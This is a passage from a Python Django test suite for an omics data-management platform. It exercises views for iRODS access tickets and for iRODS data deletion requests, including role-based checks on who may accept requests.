                values,
            )

        # Assert sample sheet state after deletion attempt (should remain,
        # contributors may not delete sheets with files)
        self.assertIsNotNone(
            Investigation.objects.filter(
                project__sodar_uuid=self.project.sodar_uuid
            ).first()
        )

        # Assert file status (operation should fail)
        self.assertEqual(irods_session.data_objects.exists(file_path), True)

        # Assert redirect
        with self.login(self.user):
            self.assertRedirects(
                response,
                reverse(
                    'samplesheets:project_sheets',
                    kwargs={'project': self.project.sodar_uuid},
                ),
            )
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsAccessTicketListView(
    SampleSheetTaskflowMixin, SampleSheetIOMixin, TestTaskflowBase
):
    """Tests for the irods access ticket list view"""

    def setUp(self):
        super().setUp()
        # Make project with owner in Taskflow and Django
        self.project, self.owner_as = self._make_project_taskflow(
            title='TestProject',
            type=PROJECT_TYPE_PROJECT,
            parent=self.category,
            owner=self.user,
            description='description',
        )
        self.investigation = self._import_isa_from_file(
            SHEET_PATH, self.project
        )
        self.study = self.investigation.studies.first()
        self.assay = self.study.assays.first()
        # Create iRODS collections
        self._make_irods_colls(self.investigation)
        self.irods_backend = get_backend_api('omics_irods')
        self.assertIsNotNone(self.irods_backend)
        self.irods_session = self.irods_backend.get_session()
        # Create iRODS track hub collections
        # NOTE: Previously these were created twice with the first results
        # discarded; the redundant first pair of calls has been removed
        assay_path = self.irods_backend.get_path(self.assay)
        self.track_hub1 = self._make_track_hub_coll(
            self.irods_session, assay_path, 'track1'
        )
        self.track_hub2 = self._make_track_hub_coll(
            self.irods_session, assay_path, 'track2'
        )

    def test_render_empty(self):
        """Test rendering the irods access ticket list view"""
        with self.login(self.user):
            response = self.client.get(
                reverse(
                    'samplesheets:irods_tickets',
                    kwargs={'project': self.project.sodar_uuid},
                )
            )
            self.assertEqual(response.status_code, 200)
            # Assert context data: no tickets exist yet
            self.assertEqual(response.context['object_list'].count(), 0)

    def test_render(self):
        """Test rendering the list view with an existing ticket"""
        post_data = {
            'path': self.track_hub1,
            'date_expires': (timezone.localtime() + timedelta(days=1)).strftime(
                '%Y-%m-%d'
            ),
            'label': 'TestTicket',
        }
        with self.login(self.user):
            # Create a ticket via the create view
            self.client.post(
                reverse(
                    'samplesheets:irods_ticket_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                post_data,
            )
            response = self.client.get(
                reverse(
                    'samplesheets:irods_tickets',
                    kwargs={'project': self.project.sodar_uuid},
                )
            )
            # The created ticket should be listed with the posted values
            self.assertEqual(response.context['object_list'].count(), 1)
            obj = response.context['object_list'].first()
            self.assertEqual(obj.get_date_expires(), post_data['date_expires'])
            self.assertEqual(obj.label, post_data['label'])
            self.assertEqual(obj.path, post_data['path'])
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsAccessTicketCreateView(
    SampleSheetTaskflowMixin, SampleSheetIOMixin, TestTaskflowBase
):
    """Tests for the irods access ticket create view"""

    def setUp(self):
        super().setUp()
        # Make project with owner in Taskflow and Django
        self.project, self.owner_as = self._make_project_taskflow(
            title='TestProject',
            type=PROJECT_TYPE_PROJECT,
            parent=self.category,
            owner=self.user,
            description='description',
        )
        self.investigation = self._import_isa_from_file(
            SHEET_PATH, self.project
        )
        self.study = self.investigation.studies.first()
        self.assay = self.study.assays.first()
        # Create iRODS collections
        self._make_irods_colls(self.investigation)
        self.irods_backend = get_backend_api('omics_irods')
        self.assertIsNotNone(self.irods_backend)
        self.irods_session = self.irods_backend.get_session()
        # Create iRODS track hub collections
        assay_path = self.irods_backend.get_path(self.assay)
        self.track_hub1 = self._make_track_hub_coll(
            self.irods_session, assay_path, 'track1'
        )
        self.track_hub2 = self._make_track_hub_coll(
            self.irods_session, assay_path, 'track2'
        )

    def test_render(self):
        """Test rendering the irods access ticket create view"""
        with self.login(self.user):
            response = self.client.get(
                reverse(
                    'samplesheets:irods_ticket_create',
                    kwargs={'project': self.project.sodar_uuid},
                )
            )
            self.assertEqual(response.status_code, 200)
            # Form should contain exactly date_expires, label and path
            self.assertEqual(len(response.context['form'].fields), 3)
            self.assertIsNotNone(
                response.context['form'].fields.get('date_expires')
            )
            self.assertIsNotNone(response.context['form'].fields.get('label'))
            self.assertIsNotNone(response.context['form'].fields.get('path'))
            # One path choice per track hub collection created in setUp()
            self.assertEqual(
                len(response.context['form'].fields['path'].widget.choices), 2
            )
            expected = [
                (
                    track_hub.path,
                    "{} / {}".format(
                        self.assay.get_display_name(), track_hub.name
                    ),
                )
                for track_hub in (
                    self.irods_backend.get_child_colls_by_path(
                        self.irods_backend.get_path(self.assay)
                        + '/'
                        + TRACK_HUBS_COLL
                    )
                )
            ]
            self.assertListEqual(
                response.context['form'].fields['path'].widget.choices, expected
            )

    def test_post(self):
        """Test posting the irods access ticket form"""
        with self.login(self.user):
            self.assertEqual(IrodsAccessTicket.objects.count(), 0)
            post_data = {
                'path': self.track_hub1,
                'date_expires': (
                    timezone.localtime() + timedelta(days=1)
                ).strftime('%Y-%m-%d'),
                'label': 'TestTicket',
            }
            response = self.client.post(
                reverse(
                    'samplesheets:irods_ticket_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                post_data,
            )
            self.assertRedirects(
                response,
                reverse(
                    'samplesheets:irods_tickets',
                    kwargs={'project': self.project.sodar_uuid},
                ),
            )
            self.assertEqual(IrodsAccessTicket.objects.count(), 1)
            ticket = IrodsAccessTicket.objects.first()
            # First message in this session is the creation notification
            self.assertEqual(
                str(list(get_messages(response.wsgi_request))[0]),
                'iRODS access ticket "%s" created.' % ticket.get_display_name(),
            )
            self.assertEqual(
                ticket.get_date_expires(), post_data['date_expires']
            )
            self.assertEqual(ticket.label, post_data['label'])
            self.assertEqual(ticket.path, post_data['path'])
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsAccessTicketUpdateView(
    SampleSheetTaskflowMixin, SampleSheetIOMixin, TestTaskflowBase
):
    """Tests for the irods access ticket update view"""

    def setUp(self):
        super().setUp()
        # Make project with owner in Taskflow and Django
        self.project, self.owner_as = self._make_project_taskflow(
            title='TestProject',
            type=PROJECT_TYPE_PROJECT,
            parent=self.category,
            owner=self.user,
            description='description',
        )
        self.investigation = self._import_isa_from_file(
            SHEET_PATH, self.project
        )
        self.study = self.investigation.studies.first()
        self.assay = self.study.assays.first()
        # Create iRODS collections
        self._make_irods_colls(self.investigation)
        self.irods_backend = get_backend_api('omics_irods')
        self.assertIsNotNone(self.irods_backend)
        self.irods_session = self.irods_backend.get_session()
        # Create iRODS track hub collections
        assay_path = self.irods_backend.get_path(self.assay)
        self.track_hub1 = self._make_track_hub_coll(
            self.irods_session, assay_path, 'track1'
        )
        self.track_hub2 = self._make_track_hub_coll(
            self.irods_session, assay_path, 'track2'
        )

    def test_render(self):
        """Test render the irods access ticket update form"""
        with self.login(self.user):
            self.assertEqual(IrodsAccessTicket.objects.count(), 0)
            post_data = {
                'path': self.track_hub1,
                'date_expires': (
                    timezone.localtime() + timedelta(days=1)
                ).strftime('%Y-%m-%d'),
                'label': 'TestTicket',
            }
            # Create a ticket to update
            self.client.post(
                reverse(
                    'samplesheets:irods_ticket_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                post_data,
            )
            self.assertEqual(IrodsAccessTicket.objects.count(), 1)
            ticket = IrodsAccessTicket.objects.first()
            response = self.client.get(
                reverse(
                    'samplesheets:irods_ticket_update',
                    kwargs={'irodsaccessticket': str(ticket.sodar_uuid)},
                )
            )
            # The form should be pre-filled with the ticket's current values
            self.assertEqual(
                response.context['form'].initial['date_expires'],
                ticket.date_expires,
            )
            self.assertEqual(
                response.context['form'].initial['label'], ticket.label
            )
            self.assertEqual(
                response.context['form'].initial['path'], ticket.path
            )

    def test_post(self):
        """Test posting the irods access ticket update form"""
        with self.login(self.user):
            self.assertEqual(IrodsAccessTicket.objects.count(), 0)
            post_data = {
                'path': self.track_hub1,
                'date_expires': (
                    timezone.localtime() + timedelta(days=1)
                ).strftime('%Y-%m-%d'),
                'label': 'TestTicket',
            }
            # Create a ticket to update
            self.client.post(
                reverse(
                    'samplesheets:irods_ticket_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                post_data,
            )
            self.assertEqual(IrodsAccessTicket.objects.count(), 1)
            ticket = IrodsAccessTicket.objects.first()
            # Empty date_expires clears the expiry date
            update_data = {
                **post_data,
                'label': 'TestTicketAltered',
                'date_expires': '',
            }
            response = self.client.post(
                reverse(
                    'samplesheets:irods_ticket_update',
                    kwargs={'irodsaccessticket': str(ticket.sodar_uuid)},
                ),
                update_data,
            )
            self.assertRedirects(
                response,
                reverse(
                    'samplesheets:irods_tickets',
                    kwargs={'project': self.project.sodar_uuid},
                ),
            )
            self.assertEqual(IrodsAccessTicket.objects.count(), 1)
            ticket = IrodsAccessTicket.objects.first()
            # Index [1]: message [0] was emitted by the create POST above
            self.assertEqual(
                str(list(get_messages(response.wsgi_request))[1]),
                'iRODS access ticket "%s" updated.' % ticket.get_display_name(),
            )
            self.assertIsNone(ticket.get_date_expires())
            self.assertEqual(ticket.label, update_data['label'])
            self.assertEqual(ticket.path, update_data['path'])
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsAccessTicketDeleteView(
    SampleSheetTaskflowMixin, SampleSheetIOMixin, TestTaskflowBase
):
    """Tests for the irods access ticket delete view"""

    def setUp(self):
        super().setUp()
        # Make project with owner in Taskflow and Django
        self.project, self.owner_as = self._make_project_taskflow(
            title='TestProject',
            type=PROJECT_TYPE_PROJECT,
            parent=self.category,
            owner=self.user,
            description='description',
        )
        self.investigation = self._import_isa_from_file(
            SHEET_PATH, self.project
        )
        self.study = self.investigation.studies.first()
        self.assay = self.study.assays.first()
        # Create iRODS collections
        self._make_irods_colls(self.investigation)
        self.irods_backend = get_backend_api('omics_irods')
        self.assertIsNotNone(self.irods_backend)
        self.irods_session = self.irods_backend.get_session()
        # Create iRODS track hub collections
        assay_path = self.irods_backend.get_path(self.assay)
        self.track_hub1 = self._make_track_hub_coll(
            self.irods_session, assay_path, 'track1'
        )
        self.track_hub2 = self._make_track_hub_coll(
            self.irods_session, assay_path, 'track2'
        )

    def test_delete(self):
        """Test deleting an irods access ticket"""
        with self.login(self.user):
            self.assertEqual(IrodsAccessTicket.objects.count(), 0)
            post_data = {
                'path': self.track_hub1,
                'date_expires': (
                    timezone.localtime() + timedelta(days=1)
                ).strftime('%Y-%m-%d'),
                'label': 'TestTicket',
            }
            # Create two tickets, one per track hub
            self.client.post(
                reverse(
                    'samplesheets:irods_ticket_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                post_data,
            )
            self.client.post(
                reverse(
                    'samplesheets:irods_ticket_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                {**post_data, 'path': self.track_hub2},
            )
            self.assertEqual(IrodsAccessTicket.objects.count(), 2)
            ticket = IrodsAccessTicket.objects.first()
            response = self.client.post(
                reverse(
                    'samplesheets:irods_ticket_delete',
                    kwargs={'irodsaccessticket': str(ticket.sodar_uuid)},
                ),
            )
            self.assertRedirects(
                response,
                reverse(
                    'samplesheets:irods_tickets',
                    kwargs={'project': self.project.sodar_uuid},
                ),
            )
            # Only the deleted ticket is removed
            self.assertEqual(IrodsAccessTicket.objects.count(), 1)
            # Index [2]: messages [0] and [1] came from the two create POSTs
            self.assertEqual(
                str(list(get_messages(response.wsgi_request))[2]),
                'iRODS access ticket "%s" deleted.' % ticket.get_display_name(),
            )
class TestIrodsRequestViewsBase(
    SampleSheetIOMixin,
    SampleSheetTaskflowMixin,
    TestTaskflowBase,
):
    """Base test class for iRODS delete requests"""

    def _get_create_alert_count(self, user, project=None):
        """
        Return alert count for active request create alerts. If project is not
        specified, default to self.project.

        :param user: User object
        :param project: Project object or None
        :return: Integer
        """
        if not project:
            project = self.project
        return self.app_alert_model.objects.filter(
            alert_name=IRODS_REQ_CREATE_ALERT_NAME,
            active=True,
            project=project,
            user=user,
        ).count()

    def setUp(self):
        super().setUp()
        self.irods_backend = get_backend_api('omics_irods')
        self.irods_session = self.irods_backend.get_session()
        # Make project with owner in Taskflow and Django
        self.project, self.owner_as = self._make_project_taskflow(
            title='TestProject',
            type=PROJECT_TYPE_PROJECT,
            parent=self.category,
            owner=self.user,
            description='description',
        )
        # Import investigation
        self.investigation = self._import_isa_from_file(
            SHEET_PATH, self.project
        )
        self.study = self.investigation.studies.first()
        self.assay = self.study.assays.first()
        # Set up iRODS data
        self._make_irods_colls(self.investigation)
        self.assay_path = self.irods_backend.get_path(self.assay)
        self.path = os.path.join(self.assay_path, TEST_FILE_NAME)
        self.path_md5 = os.path.join(self.assay_path, f'{TEST_FILE_NAME}.md5')
        # Create objects (data file plus its .md5 checksum companion)
        self.file_obj = self.irods_session.data_objects.create(self.path)
        self.md5_obj = self.irods_session.data_objects.create(self.path_md5)
        # Init users (owner = user_cat, superuser = user)
        self.user_delegate = self.make_user('user_delegate')
        self.user_contrib = self.make_user('user_contrib')
        self.user_contrib2 = self.make_user('user_contrib2')
        self.user_guest = self.make_user('user_guest')
        self._make_assignment_taskflow(
            self.project, self.user_delegate, self.role_delegate
        )
        self._make_assignment_taskflow(
            self.project, self.user_contrib, self.role_contributor
        )
        self._make_assignment_taskflow(
            self.project, self.user_contrib2, self.role_contributor
        )
        self._make_assignment_taskflow(
            self.project, self.user_guest, self.role_guest
        )
        # Get appalerts API and model
        self.app_alerts = get_backend_api('appalerts_backend')
        self.app_alert_model = self.app_alerts.get_model()
        # Set default POST data
        self.post_data = {'path': self.path, 'description': 'bla'}

    def tearDown(self):
        # Remove all test project data from iRODS
        # NOTE(review): hardcoded zone path — assumes the test zone is
        # 'omicsZone'; confirm against the test iRODS configuration
        self.irods_session.collections.get('/omicsZone/projects').remove(
            force=True
        )
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsRequestCreateView(TestIrodsRequestViewsBase):
    """Test IrodsRequestCreateView"""

    def test_create(self):
        """Test creating a delete request"""
        self.assertEqual(IrodsDataRequest.objects.count(), 0)
        self.assertEqual(self._get_create_alert_count(self.user), 0)
        self.assertEqual(self._get_create_alert_count(self.user_delegate), 0)
        with self.login(self.user_contrib):
            response = self.client.post(
                reverse(
                    'samplesheets:irods_request_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                self.post_data,
            )
            self.assertRedirects(
                response,
                reverse(
                    'samplesheets:irods_requests',
                    kwargs={'project': self.project.sodar_uuid},
                ),
            )
            obj = IrodsDataRequest.objects.first()
            self.assertEqual(
                list(get_messages(response.wsgi_request))[0].message,
                'iRODS data request "{}" created.'.format(obj.get_display_name()),
            )
            self.assertEqual(IrodsDataRequest.objects.count(), 1)
            self.assertEqual(obj.path, self.path)
            self.assertEqual(obj.description, 'bla')
            # Owner and delegate should receive a create alert
            self.assertEqual(self._get_create_alert_count(self.user), 1)
            self.assertEqual(self._get_create_alert_count(self.user_delegate), 1)

    def test_create_trailing_slash(self):
        """Test creating a delete request with trailing slash in path"""
        self.assertEqual(IrodsDataRequest.objects.count(), 0)
        # Trailing slash should be stripped from the stored path
        post_data = {'path': self.path + '/', 'description': 'bla'}
        with self.login(self.user_contrib):
            response = self.client.post(
                reverse(
                    'samplesheets:irods_request_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                post_data,
            )
            self.assertRedirects(
                response,
                reverse(
                    'samplesheets:irods_requests',
                    kwargs={'project': self.project.sodar_uuid},
                ),
            )
            obj = IrodsDataRequest.objects.first()
            self.assertEqual(
                list(get_messages(response.wsgi_request))[0].message,
                f'iRODS data request "{obj.get_display_name()}" created.',
            )
            self.assertEqual(IrodsDataRequest.objects.count(), 1)
            self.assertEqual(obj.path, self.path)
            self.assertEqual(obj.description, 'bla')

    def test_create_invalid_form_data(self):
        """Test creating a delete request with invalid form data"""
        self.assertEqual(IrodsDataRequest.objects.count(), 0)
        self.assertEqual(self._get_create_alert_count(self.user), 0)
        self.assertEqual(self._get_create_alert_count(self.user_delegate), 0)
        post_data = {'path': '/doesnt/exist', 'description': 'bla'}
        with self.login(self.user_contrib):
            response = self.client.post(
                reverse(
                    'samplesheets:irods_request_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                post_data,
            )
            self.assertEqual(
                response.context['form'].errors['path'][0],
                ERROR_MSG_INVALID_PATH,
            )
            # Nothing created, no alerts raised
            self.assertEqual(IrodsDataRequest.objects.count(), 0)
            self.assertEqual(self._get_create_alert_count(self.user), 0)
            self.assertEqual(self._get_create_alert_count(self.user_delegate), 0)

    def test_create_invalid_path_assay_collection(self):
        """Test creating a delete request with assay path (should fail)"""
        self.assertEqual(IrodsDataRequest.objects.count(), 0)
        # The assay root collection itself is not a valid request target
        post_data = {'path': self.assay_path, 'description': 'bla'}
        with self.login(self.user_contrib):
            response = self.client.post(
                reverse(
                    'samplesheets:irods_request_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                post_data,
            )
            self.assertEqual(
                response.context['form'].errors['path'][0],
                ERROR_MSG_INVALID_PATH,
            )
            self.assertEqual(IrodsDataRequest.objects.count(), 0)

    def test_create_multiple(self):
        """Test creating multiple requests"""
        path2 = os.path.join(self.assay_path, TEST_FILE_NAME2)
        path2_md5 = os.path.join(self.assay_path, TEST_FILE_NAME2 + '.md5')
        self.irods_session.data_objects.create(path2)
        self.irods_session.data_objects.create(path2_md5)
        self.assertEqual(IrodsDataRequest.objects.count(), 0)
        self.assertEqual(self._get_create_alert_count(self.user), 0)
        self.assertEqual(self._get_create_alert_count(self.user_delegate), 0)
        with self.login(self.user_contrib):
            self.client.post(
                reverse(
                    'samplesheets:irods_request_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                self.post_data,
            )
            # Use a copy for the second request instead of mutating the
            # shared self.post_data fixture in place
            self.client.post(
                reverse(
                    'samplesheets:irods_request_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                {**self.post_data, 'path': path2},
            )
            self.assertEqual(IrodsDataRequest.objects.count(), 2)
            # Still only one active create alert per user for both requests
            self.assertEqual(self._get_create_alert_count(self.user), 1)
            self.assertEqual(self._get_create_alert_count(self.user_delegate), 1)
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsRequestUpdateView(TestIrodsRequestViewsBase):
    """Test IrodsRequestUpdateView"""

    def test_update(self):
        """Test POST request for updating a delete request"""
        create_url = reverse(
            'samplesheets:irods_request_create',
            kwargs={'project': self.project.sodar_uuid},
        )
        with self.login(self.user_contrib):
            # Create the request to be updated
            self.client.post(
                create_url, {'path': self.path, 'description': 'Description'}
            )
            self.assertEqual(IrodsDataRequest.objects.count(), 1)
            req = IrodsDataRequest.objects.first()
            # Post the updated description
            response = self.client.post(
                reverse(
                    'samplesheets:irods_request_update',
                    kwargs={'irodsdatarequest': req.sodar_uuid},
                ),
                {'path': self.path, 'description': 'Updated'},
            )
            self.assertRedirects(
                response,
                reverse(
                    'samplesheets:irods_requests',
                    kwargs={'project': self.project.sodar_uuid},
                ),
            )
            req = IrodsDataRequest.objects.first()
            self.assertEqual(
                list(get_messages(response.wsgi_request))[-1].message,
                'iRODS data request "{}" updated.'.format(req.get_display_name()),
            )
            self.assertEqual(IrodsDataRequest.objects.count(), 1)
            self.assertEqual(req.path, self.path)
            self.assertEqual(req.description, 'Updated')

    def test_post_update_invalid_form_data(self):
        """Test updating a delete request with invalid form data"""
        create_url = reverse(
            'samplesheets:irods_request_create',
            kwargs={'project': self.project.sodar_uuid},
        )
        with self.login(self.user_contrib):
            self.client.post(
                create_url, {'path': self.path, 'description': 'Description'}
            )
            self.assertEqual(IrodsDataRequest.objects.count(), 1)
            req = IrodsDataRequest.objects.first()
            # An update pointing at a nonexistent path must be rejected
            response = self.client.post(
                reverse(
                    'samplesheets:irods_request_update',
                    kwargs={'irodsdatarequest': req.sodar_uuid},
                ),
                {'path': '/doesnt/exist', 'description': 'Updated'},
            )
            self.assertEqual(
                response.context['form'].errors['path'][0],
                ERROR_MSG_INVALID_PATH,
            )
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsRequestDeleteView(TestIrodsRequestViewsBase):
    """Test IrodsRequestDeleteView"""

    def test_get_contributor(self):
        """Test GET request for deleting a request"""
        self.assertEqual(IrodsDataRequest.objects.count(), 0)
        with self.login(self.user_contrib):
            self.client.post(
                reverse(
                    'samplesheets:irods_request_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                self.post_data,
            )
            self.assertEqual(IrodsDataRequest.objects.count(), 1)
            obj = IrodsDataRequest.objects.first()
            self.assertEqual(self._get_create_alert_count(self.user), 1)
            self.assertEqual(
                self._get_create_alert_count(self.user_delegate), 1
            )
            # GET only renders the confirmation form, nothing is deleted
            response = self.client.get(
                reverse(
                    'samplesheets:irods_request_delete',
                    kwargs={'irodsdatarequest': obj.sodar_uuid},
                ),
            )
            self.assertEqual(response.status_code, 200)
            self.assertEqual(IrodsDataRequest.objects.count(), 1)
            self.assertEqual(self._get_create_alert_count(self.user), 1)
            self.assertEqual(
                self._get_create_alert_count(self.user_delegate), 1
            )

    def test_delete_contributor(self):
        """Test POST request for deleting a request"""
        self.assertEqual(IrodsDataRequest.objects.count(), 0)
        with self.login(self.user_contrib):
            self.client.post(
                reverse(
                    'samplesheets:irods_request_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                self.post_data,
            )
            self.assertEqual(IrodsDataRequest.objects.count(), 1)
            obj = IrodsDataRequest.objects.first()
            self.assertEqual(self._get_create_alert_count(self.user), 1)
            self.assertEqual(
                self._get_create_alert_count(self.user_delegate), 1
            )
            response = self.client.post(
                reverse(
                    'samplesheets:irods_request_delete',
                    kwargs={'irodsdatarequest': obj.sodar_uuid},
                ),
            )
            self.assertRedirects(
                response,
                reverse(
                    'samplesheets:irods_requests',
                    kwargs={'project': self.project.sodar_uuid},
                ),
            )
            self.assertEqual(
                list(get_messages(response.wsgi_request))[-1].message,
                'iRODS data request deleted.',
            )
            # Deleting the only request also clears the create alerts
            self.assertEqual(IrodsDataRequest.objects.count(), 0)
            self.assertEqual(self._get_create_alert_count(self.user), 0)
            self.assertEqual(
                self._get_create_alert_count(self.user_delegate), 0
            )

    def test_delete_one_of_multiple(self):
        """Test deleting one of multiple requests"""
        path2 = os.path.join(self.assay_path, TEST_FILE_NAME2)
        path2_md5 = os.path.join(self.assay_path, TEST_FILE_NAME2 + '.md5')
        self.irods_session.data_objects.create(path2)
        self.irods_session.data_objects.create(path2_md5)
        self.assertEqual(IrodsDataRequest.objects.count(), 0)
        with self.login(self.user_contrib):
            self.client.post(
                reverse(
                    'samplesheets:irods_request_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                self.post_data,
            )
            # NOTE: mutates the shared fixture dict; safe since setUp()
            # rebuilds self.post_data for each test
            self.post_data['path'] = path2
            self.client.post(
                reverse(
                    'samplesheets:irods_request_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                self.post_data,
            )
            self.assertEqual(IrodsDataRequest.objects.count(), 2)
            obj = IrodsDataRequest.objects.first()
            # NOTE: Still should only have one request alert for both
            self.assertEqual(self._get_create_alert_count(self.user), 1)
            self.assertEqual(
                self._get_create_alert_count(self.user_delegate), 1
            )
            self.client.post(
                reverse(
                    'samplesheets:irods_request_delete',
                    kwargs={'irodsdatarequest': obj.sodar_uuid},
                ),
            )
            self.assertEqual(IrodsDataRequest.objects.count(), 1)
            # NOTE: After deleting just one of the requests, alerts remain
            self.assertEqual(self._get_create_alert_count(self.user), 1)
            self.assertEqual(
                self._get_create_alert_count(self.user_delegate), 1
            )
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsRequestAcceptView(TestIrodsRequestViewsBase):
    """Test IrodsRequestAcceptView"""

    def test_accept_request_doesnt_exist(self):
        """Test accepting a delete request that doesn't exist"""
        self.assertEqual(IrodsDataRequest.objects.count(), 0)
        with self.login(self.user_cat):
            response = self.client.post(
                reverse(
                    'samplesheets:irods_request_accept',
                    kwargs={'irodsdatarequest': DUMMY_UUID},
                ),
                {'confirm': True},
            )
            self.assertEqual(response.status_code, 404)

    def test_accept(self):
        """Test accepting a delete request"""
        self.assertEqual(IrodsDataRequest.objects.count(), 0)
        # Create the request as contributor
        with self.login(self.user_contrib):
            self.client.post(
                reverse(
                    'samplesheets:irods_request_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                self.post_data,
            )
        self.assertEqual(IrodsDataRequest.objects.count(), 1)
        obj = IrodsDataRequest.objects.first()
        self.assertEqual(self._get_create_alert_count(self.user), 1)
        self.assertEqual(self._get_create_alert_count(self.user_delegate), 1)
        # Accept as superuser
        with self.login(self.user):
            response = self.client.post(
                reverse(
                    'samplesheets:irods_request_accept',
                    kwargs={'irodsdatarequest': obj.sodar_uuid},
                ),
                {'confirm': True},
            )
            self.assertRedirects(
                response,
                reverse(
                    'samplesheets:irods_requests',
                    kwargs={'project': self.project.sodar_uuid},
                ),
            )
            self.assertEqual(
                list(get_messages(response.wsgi_request))[-1].message,
                'iRODS data request "{}" accepted.'.format(
                    obj.get_display_name()
                ),
            )
        obj = IrodsDataRequest.objects.first()
        self.assertEqual(obj.status, 'ACCEPTED')
        # Accepting clears the create alerts
        self.assertEqual(self._get_create_alert_count(self.user), 0)
        self.assertEqual(self._get_create_alert_count(self.user_delegate), 0)

    def test_accept_invalid_form_data(self):
        """Test accepting a delete request with invalid form data"""
        self.assertEqual(IrodsDataRequest.objects.count(), 0)
        with self.login(self.user_contrib):
            self.client.post(
                reverse(
                    'samplesheets:irods_request_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                self.post_data,
            )
        self.assertEqual(IrodsDataRequest.objects.count(), 1)
        obj = IrodsDataRequest.objects.first()
        self.assertEqual(self._get_create_alert_count(self.user), 1)
        self.assertEqual(self._get_create_alert_count(self.user_delegate), 1)
        with self.login(self.user):
            # confirm=False fails the required-field validation
            response = self.client.post(
                reverse(
                    'samplesheets:irods_request_accept',
                    kwargs={'irodsdatarequest': obj.sodar_uuid},
                ),
                {'confirm': False},
            )
            self.assertEqual(
                response.context['form'].errors['confirm'][0],
                'This field is required.',
            )
        # Request not accepted, alerts remain
        self.assertEqual(self._get_create_alert_count(self.user), 1)
        self.assertEqual(self._get_create_alert_count(self.user_delegate), 1)

    def test_accept_owner(self):
        """Test accepting a delete request as owner"""
        self.assertEqual(IrodsDataRequest.objects.count(), 0)
        with self.login(self.user_contrib):
            self.client.post(
                reverse(
                    'samplesheets:irods_request_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                self.post_data,
            )
        self.assertEqual(IrodsDataRequest.objects.count(), 1)
        obj = IrodsDataRequest.objects.first()
        # user_cat is the project owner (see base class setUp)
        with self.login(self.user_cat):
            response = self.client.post(
                reverse(
                    'samplesheets:irods_request_accept',
                    kwargs={'irodsdatarequest': obj.sodar_uuid},
                ),
                {'confirm': True},
            )
            self.assertRedirects(
                response,
                reverse(
                    'samplesheets:irods_requests',
                    kwargs={'project': self.project.sodar_uuid},
                ),
            )
            self.assertEqual(
                list(get_messages(response.wsgi_request))[-1].message,
                f'iRODS data request "{obj.get_display_name()}" accepted.',
            )
        obj = IrodsDataRequest.objects.first()
        self.assertEqual(obj.status, 'ACCEPTED')

    def test_accept_delegate(self):
        """Test accepting a delete request as delegate"""
        self.assertEqual(IrodsDataRequest.objects.count(), 0)
        with self.login(self.user_contrib):
            self.client.post(
                reverse(
                    'samplesheets:irods_request_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                self.post_data,
            )
        self.assertEqual(IrodsDataRequest.objects.count(), 1)
        obj = IrodsDataRequest.objects.first()
        with self.login(self.user_delegate):
            response = self.client.post(
                reverse(
                    'samplesheets:irods_request_accept',
                    kwargs={'irodsdatarequest': obj.sodar_uuid},
                ),
                {'confirm': True},
            )
            self.assertRedirects(
                response,
                reverse(
                    'samplesheets:irods_requests',
                    kwargs={'project': self.project.sodar_uuid},
                ),
            )
            self.assertEqual(
                list(get_messages(response.wsgi_request))[-1].message,
                f'iRODS data request "{obj.get_display_name()}" accepted.',
            )
        obj = IrodsDataRequest.objects.first()
        self.assertEqual(obj.status, 'ACCEPTED')

    def test_accept_contributor(self):
        """Test accepting a delete request as contributor"""
        self.assertEqual(IrodsDataRequest.objects.count(), 0)
        with self.login(self.user_contrib):
            self.client.post(
                reverse(
                    'samplesheets:irods_request_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                self.post_data,
            )
            self.assertEqual(IrodsDataRequest.objects.count(), 1)
            obj = IrodsDataRequest.objects.first()
            # Contributor lacks accept permission: redirected home,
            # request stays active
            response = self.client.post(
                reverse(
                    'samplesheets:irods_request_accept',
                    kwargs={'irodsdatarequest': obj.sodar_uuid},
                ),
                {'confirm': True},
            )
            self.assertRedirects(response, reverse('home'))
            self.assertEqual(IrodsDataRequest.objects.count(), 1)

    def test_accept_one_of_multiple(self):
        """Test accepting one of multiple requests"""
        path2 = os.path.join(self.assay_path, TEST_FILE_NAME2)
        path2_md5 = os.path.join(self.assay_path, TEST_FILE_NAME2 + '.md5')
        self.irods_session.data_objects.create(path2)
        self.irods_session.data_objects.create(path2_md5)
        self.assertEqual(IrodsDataRequest.objects.count(), 0)
        with self.login(self.user_contrib):
            self.client.post(
                reverse(
                    'samplesheets:irods_request_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                self.post_data,
            )
            # NOTE: mutates the shared fixture dict; safe since setUp()
            # rebuilds self.post_data for each test
            self.post_data['path'] = path2
            self.client.post(
                reverse(
                    'samplesheets:irods_request_create',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                self.post_data,
            )
        self.assertEqual(
            IrodsDataRequest.objects.filter(status='ACTIVE').count(), 2
        )
